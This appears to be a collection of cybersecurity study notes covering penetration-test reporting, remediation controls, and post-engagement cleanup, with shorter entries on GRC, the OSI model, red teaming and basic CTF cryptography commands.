The classification of a report’s contents is driven by the organization that the penetration test has been performed on and its policies on classification. In some cases, the contents of a report are considered top secret. However, as a rule of thumb, you should always consider report contents as highly classified and distribute them on a need-to-know basis only. The classification of report contents also determines the method of delivery. In general, there are two ways to distribute a report: as a hard copy or electronically. Many times, when you perform the readout of the findings from your report, you will be meeting with the stakeholders who requested the penetration test to be performed. This meeting will likely include various people from the organization, including IT, information security, and management. In most cases, they will want to have a hard copy in front of them as you walk through the readout of the findings. This is, of course, possible, but the process should be handled with care.

The following are some examples of how to control the distribution of reports:

Produce only a limited number of copies.
Define the distribution list in the scope of work.
Label each copy with a specific ID or number that is tied to the person it is distributed to.
Label each copy with the name of the person it is distributed to.
Keep a log of each hard copy, including who it was distributed to and the date it was distributed. Table 9-2 shows an example of such a log.
Ensure that each copy is physically and formally delivered to the designated recipient.
If transferring a report over a network, ensure that the document is encrypted and the method of transport is encrypted.
Ensure that the handling and distribution of an electronic copy of a report are even more restrictive than for a hard copy:
- Control distribution on a secure server that is owned by the department that initially requested the penetration test.
- Provide only one copy directly to the client or requesting party.
- Once the report is delivered to the requesting party, use a documented, secure method of deleting all collected information and any copy of the report from your machine.

Note Taking

A report is the final outcome of a penetration testing effort. The most accurate and comprehensive way to compile a report is to start collecting and organizing the results while you are still testing. In other words, you need to understand the process of ongoing documentation during testing. As you come across findings that need to be documented, take screenshots of the tools used, the steps, and the output. This will help you piece together exactly the scenario that triggered the finding and illustrate it for the end user. You should include these screenshots as part of the report because including visual proof is the best way for your audience to gain a full picture of and understand the findings. Sometimes it may even be necessary to create a video. In summary, taking screenshots, videos, and lots of notes will help you create a deliverable report.

When it comes to constructing a final penetration testing report, one of the biggest challenges is pulling together all the data and findings collected throughout the testing phases. This is especially true when the penetration test spans a long period of time. Longer test spans often require a lengthier sorting process and use of specialized tools, such as Dradis, to find the information you are looking to include in your report.

Dradis is a handy little tool that can ingest the results from many of the penetration testing tools you use and help you produce reports in formats such as CSV, HTML, and PDF. It is very flexible because it includes add-ons and allows you to create your own. If you find yourself in a situation where you need to import from a new tool that is not yet compatible, you can write your own add-on to accomplish this. TIP There are two editions of the Dradis Framework. The Community Edition (CE) is an open-source version that is freely available under the GPLv2 license. The Professional Edition (PE) is a commercial product that includes additional features for managing projects as well as more powerful reporting capabilities. The Community Edition can be found at https://github.com/dradis/dradis-ce. Information on the Professional Edition is available at https://dradisframework.com .

Report Writing Essentials

When I do a penetration test, I find many things: tool outputs, vulnerabilities, and systems not following best practices. Just listing these isn't enough. Understand the Real Risk:

A tool might say an FTP server is okay, but if I discover it's internet-facing and used for sensitive data (when it shouldn't be), that's a major concern.
I must analyze my findings and connect them to the actual environment. This is how I truly understand the risk (high, medium, low).
My report needs to give an accurate risk rating and explain the root cause of each problem. Why a Good Report Matters:
For Clients (Third-Party): My report is the proof of my work. It's like a home inspection report – the client uses it to fix issues. If my report has false positives (things I said were issues but weren't), it wastes their time and money. They won't hire me again.
For Internal Teams: If I report a vulnerability (like SQL injection) in an app without properly checking it, and it turns out to be a false positive, I cause problems. The developers will waste time trying to fix a non-existent issue. This makes them unhappy and reflects poorly on me.
https://github.com/santosomar/public-pentesting-reports

Analyzing the Findings and Recommending the Appropriate Remediation Within a Report

Technical controls

Technical controls make use of technology to reduce vulnerabilities. The following are examples of technical controls that can be recommended as mitigations and remediation of the vulnerabilities found during a pen test.

System hardening System hardening involves applying security best practices, patches, and other configurations to remediate or mitigate the vulnerabilities found in systems and applications. The system hardening process includes closing unnecessary open ports and services, removing unnecessary software, and disabling unused ports. User input sanitization and query parameterization The use of input validation (sanitizing user input) best practices is recommended to mitigate and prevent vulnerabilities such as cross-site scripting, cross-site request forgery, SQL injection, command injection, XML external entities, and other vulnerabilities explained in Module 6. OWASP provides several cheat sheets and detailed guidance on how to prevent these vulnerabilities

https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html Multifactor authentication Multifactor authentication (MFA) is authentication that requires two or more factors. Multilayer authentication requires that two or more of the same type of factors be presented. Data classification, regulatory requirements, the impact of unauthorized access, and the likelihood of a threat being exercised should all be considered when you’re deciding on the level of authentication required. The more factors, the more robust the authentication process. In response to password insecurity, many organizations have deployed multifactor authentication options to their users. With multifactor authentication, accounts are protected by something you know (password) and something you have (one-time verification code provided to you). Even gamers have been protecting their accounts using MFA for years. TIP Let’s take a look at this in practice: Jeannette inserts her bank card into an ATM and enters her PIN. What examples of multifactor authentication has she exhibited? An ATM provides a good example of MFA because it requires both “something you have” (your ATM card) and “something you know” (your PIN). Another possible factor in MFA is “something you are,” which can be based on biometrics such as fingerprints, retinal patterns, and hand geometry. Yet another factor is “somewhere you are,” such as authenticating to a specific network in a specific geographic area or boundary using geofencing or GPS. Password encryption You should always encrypt passwords, tokens, API credentials, and similar authentication data. Process-level remediation It is important to protect operating system (for example, Linux, Windows, iOS, Android) processes and make sure an attacker has not created or manipulated any processes in the underlying system. Patch management Patch management is the process of distributing, installing, and applying software updates. A patch management policy lists guidelines for proper management of vulnerabilities and includes phases such as testing, deploying, and documenting the security patches applied to your organization. Key rotation It is important to have and use a process for retiring an encryption key and replacing it by generating a new cryptographic key. Rotating keys at regular intervals allows you to reduce the attack surface and meet industry standards and compliance. Certificate management It is important to enroll, generate, manage, and revoke digital certificates in a secure manner. Secrets management solution You can take advantage of a number of tools and techniques to manage authentication credentials (secrets). These secrets include passwords, API keys, and tokens used in applications, services, and specialized systems. Employing a good secrets management solution enables you to eliminate hard-coded credentials, enforce password best practices (or eliminate passwords with other types of authentication), perform credential use monitoring, and extend secrets management to third parties in a secure manner. Examples of secrets management solutions offered by cloud providers include AWS Secrets Manager (https://aws.amazon.com/secrets-manager) and Google Cloud Secret Manager (https://cloud.google.com/secret-manager). Network segmentation Segmenting a network may involve using a combination of technologies such as firewalls, VLANs, access control lists in routers, and other techniques. For decades, servers were assigned subnets and VLANs. Sounds pretty simple, right? Well, it introduced a lot of complexities because application segmentation and policies were physically restricted to the boundaries of the VLAN within the same data center (or even in the campus). In virtual environments, the problem became bigger. Today applications can move around between servers to balance loads for performance or high availability upon failures. They can also move between different data centers and even different cloud environments.

Traditional segmentation based on VLANs constrains you to maintain policies related to which application needs to talk to which application (and who can access such applications) in centralized firewalls. This is ineffective because most traffic in data centers is now “east-west” traffic, and a lot of that traffic does not even hit the traditional firewall. In virtual environments, a lot of the traffic does not leave the physical server. You need to apply policies to restrict whether application A needs or does not need to talk to application B or which application should be able to talk to the database. These policies should not be bound by which VLAN or IP subnet the application belongs to and whether it is in the same rack or even in the same data center.

Network traffic should not make multiple trips back and forth between the applications and centralized firewalls to enforce policies between VMs. The ability to enforce network segmentation in those environments is called microsegmentation, and microsegmentation is at the VM level or between containers, regardless of a VLAN or a subnet. Microsegmentation solutions need to be application aware. This means that the segmentation process starts and ends with the application itself. Most microsegmentation environments apply a zero-trust model , which dictates that users cannot talk to applications and applications cannot talk to other applications unless a defined set of policies permits them to do so.

Administrative Controls

Administrative controls are policies, rules, or training that are designed and implemented to reduce risk and improve safety. The following are examples of administrative controls that may be recommended in your penetration testing report. Select each administrative control for more information. Role-based access control (RBAC) This type of control bases access permissions on the specific role or function. Administrators grant access rights and permissions to roles. Each user is then associated with a role. There is no provision for assigning rights to a user or group account. For example, say that you have two users: Hannah and Derek. Derek is associated with the role of Engineer and inherits all the permissions assigned to the Engineer role. Derek cannot be assigned any additional permissions. Hannah is associated with the role “Sales” and inherits all the permissions assigned to the Sales role and cannot access Engineer resources. Users can belong to multiple groups. RBAC enables you to control what users can do at both broad and granular levels. Secure software development life cycle The software development life cycle (SDLC) provides a structured and standardized process for all phases of any system development effort. The act of incorporating security best practices, policies, and technologies to find and remediate vulnerabilities during the SDLC is referred to as the secure software development life cycle (SSDLC). OWASP provides several best practices and guidance on implementing the SSDLC at https://owasp.org/www-project-integration-standards/writeups/owasp_in_sdlc. In addition, the OWASP Software Assurance Maturity Model (SAMM) provides an effective and measurable way for all types of organizations to analyze and improve their software security posture. You can find more details about OWASP’s SAMM at https://owaspsamm.org. Minimum password requirements Different organizations may have different password complexity requirements (for example, minimum length, the use of uppercase letters, lowercase letters, numeric, and special characters). At the end of the day, the best solution is to use multifactor authentication (as discussed earlier in this module) instead of just simple password authentication. Policies and procedures A cybersecurity policy is a directive that defines how the organization protects its information assets and information systems, ensures compliance with legal and regulatory requirements, and maintains an environment that supports the guiding principles. The objective of a cybersecurity policy and corresponding program is to protect the organization, its employees, its customers, and its vendors and partners from harm resulting from intentional or accidental damage, misuse, or disclosure of information, as well as to protect the integrity of the information and ensure the availability of information systems. Successful policies establish what must be done and why it must be done–but not how to do it. A good policy must be endorsed, relevant, realistic, attainable, adaptable, enforceable, and inclusive.

Operational Controls

Operational controls focus on day-to-day operations and strategies. They are implemented by people instead of machines and ensure that management policies are followed during intermediate-level operations. The following are examples of operational controls that often allow organizations to improve their security operations. Select each operation control for more information. Job rotation Allowing employees to rotate from one team to another or from one role to a different one allows individuals to learn new skills and get more exposure to other security technologies and practices. Time-of-day restrictions You might want to restrict access to users based on the time of the day. For example, you may only allow certain users to access specific systems during working hours. Mandatory vacations Depending on your local labor laws, you may be able to mandate that your employees take vacations during specific times (for example, mandatory holiday shutdown periods). User training All employees, contractors, interns, and designated third parties must receive security training appropriate to their position throughout their tenure. The training must cover at least compliance requirements, company policies, and handling of standards. A user should have training and provide written acknowledgment of rights and responsibilities prior to being granted access to information and information systems. Organizations will reap significant benefits from training users throughout their tenure.

Security awareness programs, security training, and security education all serve to reinforce the message that security is important. Security awareness programs are designed to remind users of appropriate behaviors. Security education and training teach specific skills and are the basis for decision-making. The National Institute of Standards and Technology (NIST) published Special Publication 800-50, “Building an Information Technology Security Awareness and Training Program,” which succinctly defines why security education and training are so important.

Physical Controls

Physical controls use security measures to prevent or deter unauthorized access to sensitive locations or material. The following are examples of physical controls that can be recommended in your penetration testing report. Select each physical control for more information. Access control vestibule An access control vestibule (formerly known as a mantrap) is a space with typically two sets of interlocking doors, where one door must close before the second door opens. Biometric controls These controls include fingerprint scanning, retinal scanning, and face recognition, among others. Video surveillance Cameras may be used to record and monitor activities in the physical premises.

Importance of Communication

The report is the final deliverable in a penetration test. It communicates all the activities performed during the test as well as the ultimate results in the form of findings and recommendations. The report is, however, not the only form of communication that you will have with a client during a penetration testing engagement. During the testing phases of the engagement, certain situations may arise in which you need to have a plan for communication and escalation.

Poor communication among stakeholders, including your client and your own team, can also contribute to scope creep.

It is extremely important that you understand the communication path and communication channels with your client. You should always have good open lines of communication with your client and the stakeholders that hired you, including the following:

Primary contact: This is the stakeholder who hired you or the main contact identified by the person who hired you.
Technical contacts: You should document any IT staff or security analysts/engineers that you might need to contact for assistance during the testing.
Emergency contacts: You should clearly document who should be contacted in case of an emergency.

Communication Triggers

It is important that you have situational awareness to properly communicate any significant findings to your client. The following are a few examples of communication triggers:

Critical findings: You should document (as early as in the pre-engagement phase) how critical findings should be communicated and when. Your client might require you to report any critical findings at the time of discovery instead of waiting to inform the client in your final report.
Status reports: Your client may ask you to provide periodic status reports about how the testing is progressing.
Indicators of prior compromise: During a penetration test, you may find that a real (malicious) attacker has likely already compromised the system. You should immediately communicate any indicators of prior compromise and not wait until you deliver the final report.

Reasons for Communication

You should know the proper ways to deescalate any situation you may encounter with a client. You should also try to deconflict any potentially redundant or irrelevant information from your report and communication with your client. Try to identify and avoid false positives in your report.

You should also report any criminal activity that you may have discovered. For example, you may find that one of the employees may be using corporate assets to attack another company, steal information, or perform some other illegal activity.

[!TIP] The term false positive is a broad term that describes a situation in which a security device triggers an alarm but there is no malicious activity or actual attack taking place. In other words, false positives are “false alarms”; they are also called “benign triggers”. False positives are problematic because by triggering unjustified alerts, they diminish the value and urgency of real alerts. Having too many false positives to investigate becomes an operational nightmare and is likely to cause you to overlook real security events. There are also false negatives, which are malicious activities that are not detected by a network security device. A true positive is a successful identification of a security attack or a malicious event. A true negative occurs when an intrusion detection device identifies an activity as acceptable behavior, and the activity is actually acceptable.

Goal Reprioritization and Presentation of Findings

Depending on the vulnerabilities and weaknesses that you find during a penetration testing engagement, your client may tweak or reprioritize the goal of the testing. Your client may prioritize some systems or applications that may not have been seen as critical. Similarly, your client might ask you to deprioritize some activities in order to focus on some goals that may now present a higher risk.

[!TIP] The report is the final deliverable for a penetration test. It communicates all the activities performed during the test as well as the ultimate results in the form of findings and recommendations. The report is, however, not the only form of communication that you will have with a client during a penetration testing engagement. During the testing phases of the engagement, certain situations may arise in which you need to have a plan for communication and escalation.

The findings and recommendations section is the meat of a penetration testing report. The information provided here is what will be used to move forward with remediation and mitigation of the issues found in the environment being tested. Whereas earlier sections of the report, such as the executive summary, are purposely not too technical, the findings and recommendations section should provide all the technical details necessary that teams like IT, information security, and development need to use the report to address the issues found in the testing phase.

Post-Report Delivery Activities

There are several important activities that you must complete after delivering a penetration testing report to a client.

Post-Engagement Cleanup

Say that you have completed all the testing phases for a penetration test. What you do next is very important to the success of the engagement. Throughout your testing phases, you have likely used many different tools and techniques to gather information, discover vulnerabilities, and perhaps exploit the systems under test. These tools can and most likely will cause residual effects on the systems you have been testing.

Let’s say, for instance, that you have completed a web application penetration test and used an automated web vulnerability scanner in your testing process. This type of tool is meant to discover issues such as input validation and SQL injection. To identify these types of flaws, the automated scanner needs to actually input information into the fields it is testing. The input can be fake data or even malicious scripts. As this information is being input, it will likely make its way into the database that is supporting the web application you are testing. When the testing is complete, that information needs to be cleaned from the database. The best option for this is usually to revert or restore the database to a previous state. This is why it is suggested to test against a staging environment when possible. This is just one example of a cleanup task that needs to be performed at the end of a penetration testing engagement.

Another common example of necessary cleanup is the result of any exploitation of client machines. Say that you are looking to gain shell access to a Windows system that you have found to be vulnerable to a buffer overflow vulnerability that leads to remote code execution. Of course, when you find that this machine is likely vulnerable, you are excited because you know that the Metasploit framework has a module that will allow you to easily exploit the vulnerability and give you a root shell on the system. You run the exploit, but you get an error message that it did not complete, and there may be cleanup necessary. Most of the time, the error message indicates which files you need to clean up. However, it may not, and if it doesn’t, you need to take a look at the specific module code to determine what files you need to clean up. Many tools can leave behind residual files or data that you need to be sure to clean from the target systems after the testing phases of a penetration testing engagement are complete. It is also very important to have the client or system owner validate that your cleanup efforts are sufficient. This is not always easy to accomplish, but providing a comprehensive list of activities performed on any systems under test will help with this.

The following are some examples of the items you will want to be sure to clean from systems:

Tester-created credentials: Remove any user accounts that you created to maintain persistent access or for any other post-exploitation activity.
Shells: Remove shells spawned on exploited systems.
Tools: Remove any tools installed or run from the systems under test.

Additional Post-Report Delivery Activities

Client acceptance You should have written documentation of your client’s acceptance of your report and related deliverables. Lessons learned It is important to analyze and present any lessons learned during the penetration testing engagement. Follow-up actions/retest Your client may ask you to retest different applications or systems after you provide the report. You should follow up and take care of any action items in an agreed appropriate time frame. Attestation of findings You should provide clear acknowledgement proving that the assessment was performed and reporting your findings. Data destruction process You need to destroy any client sensitive data as agreed in the pre-engagement activities.

[Vault: Tools] OpenSSL

Thu, 04 Dec 2025 15:25:37 GMT

openssl aes-256-cbc -pbkdf2 -a -d -in cipher.encrypted -out cipher.recovered -k password

In this instance, the openssl command reverses the encryption of the file with a secure symmetric cipher, as indicated by AES-256-CBC. The -pbkdf2 option is used to add extra security to the key, and -a indicates the desired encoding for the output. The -d indicates decrypting, while -in specifies the input file and -out specifies the output file. The -k specifies the password, which in this example is password.

[Vault: Cryptography] CTF Cryptography

Thu, 04 Dec 2025 13:34:12 GMT

Binary

![[attachments/CTF-Cryptography-IMG-20260131120852722.png]]

Binary basics : https://learn.sparkfun.com/tutorials/binary

Base64 basics : https://levelup.gitconnected.com/an-introduction-to-base64-encoding-716cdccc58ce

Historical encoding

Semaphore flag signals ![[attachments/CTF-Cryptography-IMG-20260131120852931.webp]]
Morse Code ![[attachments/CTF-Cryptography-IMG-20260131120853033.webp]] https://morsecode.world/international/translator.html
Braille ![[attachments/CTF-Cryptography-IMG-20260131120853133.webp]]
Maritime Signal Flags https://en.wikipedia.org/wiki/International_maritime_signal_flags ![[attachments/CTF-Cryptography-IMG-20260131120853218.png]]

Cipher

Caeser Cipher Left shift 3

cat cipher.txt | tr "d-za-cD-ZA-C" "a-zA-Z"

The tr command translates text from one set of characters to another, using a mapping. The first parameter to the tr command represents the input set of characters, and the second represents the output set of characters. Hence, if you provide parameters “abcd” and “pqrs”, and the input string to the tr command is “ac”, the output string will be “pr".

https://www.dcode.fr/cipher-identifier
https://www.boxentriq.com/code-breaking/caesar-cipher
https://www.dummies.com/article/home-auto-hobbies/games/puzzles/cryptograms/cryptography-101-basic-solving-techniques-for-substitution-ciphers-195424/
https://www.boxentriq.com/code-breaking/vigenere-cipher
https://ctf101.org/cryptography/what-is-xor/

[Vault: GRC] Data lifecycle

Thu, 04 Dec 2025 13:34:12 GMT

Organizations of all sizes handle a large amount of data that must be kept private. In security, data vulnerabilities are often mapped in a model known as the data lifecycle. Each stage of the data lifecycle plays an important role in the security controls that are put in place to maintain the [[CIA Triad]] of information.

The data lifecycle is an important model that security teams consider when protecting information. It influences how they set policies that align with business objectives. It also plays an important role in the technologies security teams use to make information accessible.

In general, the data lifecycle has five stages. Each describe how data flows through an organization from the moment it is created until it is no longer useful:

Collect
Store
Use
Archive
Destroy ![[attachments/Data-lifecycle-IMG-20260131121050909.png|600x304]]

Data governance

Data governance is a set of processes that define how an organization manages information. Governance often includes policies that specify how to keep data private, accurate, available, and secure throughout its lifecycle.

Effective data governance is a collaborative activity that relies on people. Data governance policies commonly categorize individuals into a specific role:

Data owner: the person that decides who can access, edit, use, or destroy their information.
Data custodian: anyone or anything that's responsible for the safe handling, transport, and storage of information.
Data steward: the person or group that maintains and implements data governance policies set by an organization.

Businesses store, move, and transform data using a wide range of IT systems. Data governance policies often assign accountability to data owners, custodians, and stewards.

[Vault: GRC] Security Audits

Thu, 04 Dec 2025 11:02:49 GMT

Security audits

A security audit is a review of an organization's security controls, policies, and procedures against a set of expectations. Two main types of security audits: external and internal.

Internal Audit

An internal security audit is typically conducted by a team of people that might include an organization's compliance officer, security manager, and other security team members. Internal security audits are used to help improve an organization's security posture and help organizations avoid fines from governing agencies due to a lack of compliance. Internal security audits help security teams identify organizational risk, assess controls, and correct compliance issues. Common elements of internal audits:

establishing the scope and goals of the audits
conducting a risk assessment of the organization's assets
completing a controls assessment
assessing compliance
communicating results to stakeholders.

Scope refers to the specific criteria of an internal security audit. Goals are an outline of the organization's security objectives, or what they want to achieve in order to improve their security posture.

Auditing account privileges

Usage audits

When conducting a usage audit, the security team will review which resources each account is accessing and what the user is doing with the resource. Usage audits can help determine whether users are acting in accordance with an organization’s security policies. They can also help identify whether a user has permissions that can be revoked because they are no longer being used.

Privilege audits

Users tend to accumulate more access privileges than they need over time, an issue known as privilege creep. This might occur if an employee receives a promotion or switches teams and their job duties change. Privilege audits assess whether a user's role is in alignment with the resources they have access to.

Account change audits

Account directory services keep records and logs associated with each user. Changes to an account are usually saved and can be used to audit the directory for suspicious activity, like multiple attempts to change an account password. Performing account change audits helps to ensure that all account changes are made by authorized users.

[Vault: GRC] Security Risks

Thu, 04 Dec 2025 11:02:49 GMT

[[Threats]] and Risks

A threat is any circumstance or event that can negatively impact assets.

People are the biggest threat to a company’s security. This is why educating employees about security challenges is essential for minimizing the possibility of a breach. A risk is anything that can impact the confidentiality, integrity, or availability of an asset.
A low-risk asset is information that would not harm the organization's reputation or ongoing operations, and would not cause financial damage if compromised. This includes public information such as website content, or published research data.
A medium-risk asset might include information that's not available to the public and may cause some damage to the organization's finances, reputation, or ongoing operations. For example, the early release of a company's quarterly earnings could impact the value of their stock.
A high-risk asset is any information protected by regulations or laws, which if compromised, would have a severe negative impact on an organization's finances, ongoing operations, or reputation. This could include leaked assets with SPII, PII, or intellectual property.
Security posture: refers to an organization's ability to manage its defense of critical assets and data and react to change.

[[Security Frameworks]]

NIST’s Risk Management Framework (RMF)

7 steps

Prepare Activities that are necessary to manage security and privacy risks before a breach occurs
Categorize Used to develop risk management processes and tasks
Select Choose, customize, and capture documentation of the controls that protect an organization.
Implement Implement security and privacy plans for the organization.
Assess Determine if established controls are implemented correctly.
Authorize Being accountable for the security and privacy risks that may exist in an organization.
Monitor Be aware of how systems are operating.

Vulnerabilities

A vulnerability is a weakness that can be exploited by a threat. Therefore, organizations need to regularly inspect for vulnerabilities within their systems. Some vulnerabilities include:

ProxyLogon: A pre-authenticated vulnerability that affects the Microsoft Exchange server. This means a threat actor can complete a user authentication process to deploy malicious code from a remote location.
ZeroLogon: A vulnerability in Microsoft’s Netlogon authentication protocol. An authentication protocol is a way to verify a person's identity. Netlogon is a service that ensures a user’s identity before allowing access to a website's location.
Log4Shell: Allows attackers to run Java code on someone else’s computer or leak sensitive information. It does this by enabling a remote attacker to take control of devices connected to the internet and run malicious code.
PetitPotam: Affects Windows New Technology Local Area Network (LAN) Manager (NTLM). It is a theft technique that allows a LAN-based attacker to initiate an authentication request.
Security logging and monitoring failures: Insufficient logging and monitoring capabilities that result in attackers exploiting vulnerabilities without the organization knowing it
Server-side request forgery: Allows attackers to manipulate a server-side application into accessing and updating backend resources. It can also allow threat actors to steal data.

Security Controls

Security controls are safeguards designed to reduce specific security risks. They are used with security frameworks to establish a strong security posture. Security controls can be organized into three types: Technical, operational, and managerial.

Technical control types include the many technologies used to protect assets. This includes encryption, authentication systems, and others.
Operational controls relate to maintaining the day-to-day security environment. Generally, people perform these controls like awareness training and incident response.
Managerial controls are centered around how the other two reduce risk. Examples of management controls include policies, standards, and procedures. Typically, organization's security policy outlines the controls needed to achieve their goals.

Information privacy is the protection of unauthorized access and distribution of data.
Security controls should be designed with the principle of least privilege in mind.
A data owner is a person who decides who can access, edit, use, or destroy their information.

OWASP Security principles

Minimize attack surface area: Attack surface refers to all the potential vulnerabilities a threat actor could exploit.
Principle of least privilege: Users have the least amount of access required to perform their everyday tasks.
Defense in depth: Organizations should have varying security controls that mitigate risks and threats.
Separation of duties: Critical actions should rely on multiple people, each of whom follow the principle of least privilege.
Keep security simple: Avoid unnecessarily complicated solutions. Complexity makes security difficult.
Fix security issues correctly: When security incidents occur, identify the root cause, contain the impact, identify vulnerabilities, and conduct tests to ensure that remediation is successful. Additional OWASP security principles
Fail securely: It means that when a control fails or stops, it should do so by defaulting to its most secure option.
Don’t trust services: organization shouldn’t explicitly trust that their partners’ systems are secure.
Avoid security by obscurity: The security of key systems should not rely on keeping details hidden.

[[CISSP Domains]]

Asset Security

Asset management is the process of tracking assets and the risks that affect them. The idea behind this process is simple: you can only protect what you know you have. Asset classification is the practice of labeling assets based on sensitivity and importance to an organization.

Common asset classifications

Asset classification helps organizations implement an effective risk management strategy. It also helps them prioritize security resources, reduce IT costs, and stay in compliance with legal regulations.

Restricted is the highest level. This category is reserved for incredibly sensitive assets, like need-to-know information.
Confidential refers to assets whose disclosure may lead to a significant negative impact on an organization.
Internal-only describes assets that are available to employees and business partners.
Public is the lowest level of classification. These assets have no negative consequences to the organization if they’re released.

[Vault: Networking] OSI Model

Tue, 18 Nov 2025 09:31:05 GMT

All communication on a network is organized using network protocols. Previously, you learned about the Transmission Control Protocol (TCP), which establishes connections between two devices, and the Internet Protocol (IP), which is used for routing and addressing data packets as they travel between devices on a network. These protocols are used on specific internet layers in the TCP/IP model. The 4-layer TCP/IP model is a condensed form of the OSI (open Systems Interconnection) model, which is made up of 7 layers. The OSI model will provide a more in depth understanding of the processes that occur at each layer. We will work backwards from layer seven to layer one, going from the processes that involve direct user interaction with the network to those that involve the physical connection to the internet via network components like cables and switches. This reading will also review the main differences between the TCP/IP and OSI models.

The TCP/IP model vs. the OSI model

The TCP/IP model is a framework used to visualize how data is organized and transmitted across a network. This model helps network engineers and security analysts conceptualize processes on the network and communicate where disruptions or security threats occur.

The TCP/IP model has four layers: the network access layer, internet layer, transport layer, and application layer. When analyzing network events, security professionals can determine what layer or layers an attack occurred in based on what processes were involved in the incident.

The OSI model is a standardized concept that describes the seven layers computers use to communicate and send data over the network. Network and security professionals often use this model to communicate with each other about potential sources of problems or security threats when they occur.

Some organizations rely heavily on the TCP/IP model, while others prefer to use the OSI model. As a security analyst, it’s important to be familiar with both models. Both the TCP/IP and OSI models are useful for understanding how networks work.

Layer 7: Application layer

The application layer includes processes that directly involve the everyday user. This layer includes all of the networking protocols that software applications use to connect a user to the internet. This characteristic is the identifying feature of the application layer—user connection to the internet via applications and requests.

An example of a type of communication that happens at the application layer is using a web browser. The internet browser uses HTTP or HTTPS to send and receive information from the website server. The email application uses simple mail transfer protocol (SMTP) to send and receive email information. Also, web browsers use the domain name system (DNS) protocol to translate website domain names into IP addresses which identify the web server that hosts the information for the website.

Layer 6: Presentation layer

Functions at the presentation layer involve data translation and encryption for the network. This layer adds to and replaces data with formats that can be understood by applications (layer 7) on both sending and receiving systems. Formats at the user end may be different from those of the receiving system. Processes at the presentation layer require the use of a standardized format.

Some formatting functions that occur at layer 6 include encryption, compression, and confirmation that the character code set can be interpreted on the receiving system. One example of encryption that takes place at this layer is SSL, which encrypts data between web servers and browsers as part of websites with HTTPS.

Layer 5: Session layer

A session describes when a connection is established between two devices. An open session allows the devices to communicate with each other. Session layer protocols keep the session open while data is being transferred and terminate the session once the transmission is complete.

The session layer is also responsible for activities such as authentication, reconnection, and setting checkpoints during a data transfer. If a session is interrupted, checkpoints ensure that the transmission picks up at the last session checkpoint when the connection resumes. Sessions include a request and response between applications. Functions in the session layer respond to requests for service from processes in the presentation layer (layer 6) and send requests for services to the transport layer (layer 4).

Layer 4: Transport layer

The transport layer is responsible for delivering data between devices. This layer also handles the speed of data transfer, flow of the transfer, and breaking data down into smaller segments to make them easier to transport. Segmentation is the process of dividing up a large data transmission into smaller pieces that can be processed by the receiving system. These segments need to be reassembled at their destination so they can be processed at the session layer (layer 5). The speed and rate of the transmission also has to match the connection speed of the destination system. TCP and UDP are transport layer protocols.

Layer 3: Network layer

The network layer oversees receiving the frames from the data link layer (layer 2) and delivers them to the intended destination. The intended destination can be found based on the address that resides in the frame of the data packets. Data packets allow communication between two networks. These packets include IP addresses that tell routers where to send them. They are routed from the sending network to the receiving network.

Layer 2: Data link layer

The data link layer organizes sending and receiving data packets within a single network. The data link layer is home to switches on the local network and network interface cards on local devices.

Protocols like network control protocol (NCP), high-level data link control (HDLC), and synchronous data link control protocol (SDLC) are used at the data link layer.

Layer 1: Physical layer

As the name suggests, the physical layer corresponds to the physical hardware involved in network transmission. Hubs, modems, and the cables and wiring that connect them are all considered part of the physical layer. To travel across an ethernet or coaxial cable, a data packet needs to be translated into a stream of 0s and 1s. The stream of 0s and 1s are sent across the physical wiring and cables, received, and then passed on to higher levels of the OSI model. ![[attachments/OSI-Model-img-202510091530.png]]

[Vault: Offensive Security] Red Team

Sat, 15 Nov 2025 09:39:56 GMT

A red team is a group of cybersecurity experts and penetration testers hired by an organization to mimic a real threat actor by exposing vulnerabilities and risks regarding technology, people, and physical security.

Red teaming is a term borrowed from the military. In military exercises, a group would take the role of a red team to simulate attack techniques to test the reaction capabilities of a defending team, generally known as blue team, against known adversary strategies. Translated into the world of cybersecurity, red team engagements consist of emulating a real threat actor's Tactics, Techniques and Procedures (TTPs) so that we can measure how well our blue team responds to them and ultimately improve any security controls in place.

Red Team Engagements

Red team engagements also improve on regular penetration tests by considering several attack surfaces:

Technical Infrastructure: Like in a regular penetration test, a red team will try to uncover technical vulnerabilities, with a much higher emphasis on stealth and evasion.
Social Engineering: Targeting people through phishing campaigns, phone calls or social media to trick them into revealing information that should be private.
Physical Intrusion: Using techniques like lockpicking, RFID cloning, exploiting weaknesses in electronic access control devices to access restricted areas of facilities.

Depending on the resources available, the red team exercise can be run in several ways:

Full Engagement: Simulate an attacker's full workflow, from initial compromise until final goals have been achieved.
Assumed Breach: Start by assuming the attacker has already gained control over some assets, and try to achieve the goals from there. As an example, the red team could receive access to some user's credentials or even a workstation in the internal network.
Table-top Exercise: An over the table simulation where scenarios are discussed between the red and blue teams to evaluate how they would theoretically respond to certain threats. Ideal for situations where doing live simulations might be complicated.

There are several factors and people involved within a red team engagement. Everyone will have their mindset and methodology to approach the engagement personnel; however, each engagement can be broken into three teams or cells. Below is a brief table illustrating each of the teams and a brief explanation of their responsibilities.

| Team | Definition | | ---------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | | Red Cell | A red cell is the component that makes up the offensive portion of a red team engagement that simulates a given target's strategic and tactical responses. | | Blue Cell | The blue cell is the opposite side of red. It includes all the components defending a target network. The blue cell is typically comprised of blue team members, defenders, internal staff, and an organisation's management. | | White Cell | Serves as referee between red cell activities and blue cell responses during an engagement. Controls the engagement environment/network. Monitors adherence to the ROE. Coordinates activities required to achieve engagement goals. Correlates red cell activities with defensive actions. Ensures the engagement is conducted without bias to either side. | Roles and responsibilities of members of the red team.

|Role|Purpose| |---|---| |Red Team Lead|Plans and organises engagements at a high level—delegates, assistant lead, and operators engagement assignments.| |Red Team Assistant Lead|Assists the team lead in overseeing engagement operations and operators. Can also assist in writing engagement plans and documentation if needed.| |Red Team Operator|Executes assignments delegated by team leads. Interpret and analyse engagement plans from team leads.|

Engagement Structure

A core function of the red team is adversary emulation. While not mandatory, it is commonly used to assess what a real adversary would do in an environment using their tools and methodologies. The red team can use various cyber kill chains to summarize and assess the steps and procedures of an engagement.

The blue team commonly uses cyber kill chains to map behaviors and break down an adversaries movement. The red team can adapt this idea to map adversary TTPs (Tactics, Techniques, and Procedures) to components of an engagement.

Many regulation and standardization bodies have released their cyber kill chain. Each kill chain follows roughly the same structure, with some going more in-depth or defining objectives differently. Below is a small list of standard cyber kill chains.

